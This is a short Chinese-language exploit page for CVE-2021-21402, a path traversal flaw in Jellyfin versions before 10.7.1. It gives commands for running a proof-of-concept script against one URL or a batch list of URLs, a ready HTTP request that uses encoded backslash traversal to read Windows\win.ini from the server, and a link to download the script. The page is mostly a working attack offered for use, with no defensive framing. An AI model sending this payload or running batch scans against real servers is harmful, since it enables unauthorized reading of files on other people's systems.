## 影响范围
“`http
Jellyfin < 10.7.1
```
## POC
```bash
#单个url测试
python3 CVE-2021-21402.py -u http://127.0.0.1:1111
#批量检测
python3 CVE-2021-21402.py -f url.txt
```
## EXP
```
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host:xxx.xxx.xxx.xxx
Content-Type: application/octet-stream
```
[点我下载 CVE-2021-21402.py](/Gr33kLibrary/download_tool/72/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容